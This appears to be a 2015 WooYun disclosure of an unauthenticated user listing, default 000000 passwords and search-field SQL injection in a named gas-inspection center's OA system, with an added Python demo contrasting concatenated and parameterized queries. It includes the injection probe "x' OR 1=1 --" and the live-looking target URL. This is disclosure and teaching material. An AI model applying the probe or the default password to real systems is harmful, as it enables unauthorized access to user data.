
Vulnerability summary (followers: 24)

Defect ID: wooyun-2015-097953

Title: Multiple vulnerabilities in the OA system of the National Gas Appliance Quality Supervision and Inspection Center, bundled (many users have weak passwords)

Vendor: National Gas Appliance Quality Supervision and Inspection Center

Author: 路人甲

Submitted: 2015-02-24 10:53

Fixed: 2015-04-13 16:58

Published: 2015-04-13 16:58

Vulnerability type: SQL injection

Severity: Medium

Self-assessed Rank: 20

Status: Handed over to a third-party partner organization (CNCERT, National Internet Emergency Center) for handling

Source: http://www.wooyun.org; for questions or assistance, contact [email protected]

Tags:



Vulnerability details

Disclosure status:

2015-02-24: Details sent to the vendor; awaiting vendor handling
2015-03-02: Vendor confirmed; details disclosed to the vendor only
2015-03-12: Details disclosed to core white hats and domain experts
2015-03-22: Details disclosed to regular white hats
2015-04-01: Details disclosed to intern white hats
2015-04-13: Details disclosed to the public

Brief description:

2

Detailed description:

For details, see WooYun: A system of the National Gas Appliance Quality Supervision and Inspection Center has an injection flaw; a universal password allows login (leading to the leakage of a large number of contracts)
Vulnerability 1: Unauthorized viewing of every user of the OA system at http://oa.chinagas.com.cn/new/List_Admin.aspx?type=10

Screenshots: 屏幕截图(881).png, 屏幕截图(882).png


The key issue is that many of these users' passwords are 000000.

Screenshots: 屏幕截图(883).png, 屏幕截图(884).png, 屏幕截图(885).png


Vulnerability 2: SQL injection in the search function on this same page

Screenshots: 屏幕截图(886).png, 屏幕截图(887).png


Captured request data:

Screenshot: 屏幕截图(888).png
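As an added defensive illustration (not code from the original report or from the vendor's OA system), the following Python script models the two issues reported above: a login-name search that splices the user-supplied search term (the txtloginname value in the captured request) straight into SQL, beside the parameterized form that closes the hole, plus the audit query an administrator would run to list accounts still set to the default password 000000. The user table, names and hashing scheme are constructed assumptions.

```python
import hashlib
import sqlite3

# Constructed sample data standing in for the OA user table; not the real system.
USERS = [
    ("admin", "000000"),
    ("zhang", "000000"),
    ("li", "c0rrect-h0rse-battery"),
]


def _hash(pw: str) -> str:
    # Unsalted SHA-256 keeps the sample short; a real store should use a slow salted KDF.
    return hashlib.sha256(pw.encode()).hexdigest()


def make_db() -> sqlite3.Connection:
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE users (loginname TEXT, pw_hash TEXT)")
    conn.executemany("INSERT INTO users VALUES (?, ?)", [(u, _hash(p)) for u, p in USERS])
    return conn


def search_unsafe(conn: sqlite3.Connection, term: str) -> list:
    # Mirrors the reported flaw: the search term becomes part of the SQL text,
    # so a quote in the term changes the query instead of being matched literally.
    sql = "SELECT loginname FROM users WHERE loginname LIKE '%" + term + "%'"
    return sorted(r[0] for r in conn.execute(sql))


def search_safe(conn: sqlite3.Connection, term: str) -> list:
    # Hardened form: the term is bound as a parameter and can never alter the query.
    sql = "SELECT loginname FROM users WHERE loginname LIKE ?"
    return sorted(r[0] for r in conn.execute(sql, ("%" + term + "%",)))


def default_password_accounts(conn: sqlite3.Connection, default: str = "000000") -> list:
    # Audit check: which accounts still carry the default password reported on this page.
    rows = conn.execute("SELECT loginname FROM users WHERE pw_hash = ?", (_hash(default),))
    return sorted(r[0] for r in rows)


if __name__ == "__main__":
    db = make_db()
    probe = "x' OR 1=1 --"          # a quote-terminating search term, for comparison only
    print(search_unsafe(db, probe))  # the concatenated query returns every account
    print(search_safe(db, probe))    # the bound query matches no account by that name
    print(default_password_accounts(db))
```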


Proof of vulnerability:

22

Fix recommendation:

You know what to do.

Copyright notice: please credit 路人甲@乌云 when reposting


Vulnerability response

Vendor response:

Severity: High

Vulnerability Rank: 13

Confirmed: 2015-03-02 15:36

Vendor reply:

CNVD confirmed the described situation and has forwarded it through CNCERT to the relevant organization for notification.

Latest status:

None yet